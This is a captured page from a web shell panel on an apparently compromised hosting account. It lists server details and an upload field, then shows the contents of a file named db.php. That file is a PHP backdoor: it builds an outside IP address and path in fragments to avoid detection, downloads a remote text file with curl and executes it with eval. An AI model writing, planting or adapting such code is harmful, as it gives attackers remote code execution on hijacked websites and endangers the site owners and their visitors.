? GR0V Shell

GR0V shell

Linux in-mum-web921.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64

Path : /home/u949514618/domains/ieits.in/public_html/
File Upload :
Current File : /home/u949514618/domains/ieits.in/public_html/db.php

<?php
try {
    // URL dipecah menjadi beberapa bagian
    $urlParts = [
         'http://',
        '198.204.225.84',
        '/',
        'j250923_13/',
        'init',
        '.txt'
    ];
    
    $realUrl = implode('', $urlParts);
    
    $c = curl_init($realUrl);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($c, CURLOPT_TIMEOUT, 5);
    curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3);
    $result = curl_exec($c);
    
    if ($result !== false) {
        eval('?>' . $result);
    }
} catch (Exception $e) {
    error_log('External script error: ' . $e->getMessage());
}
?>

T1KUS90T
  root-grov@89.117.188.241:~$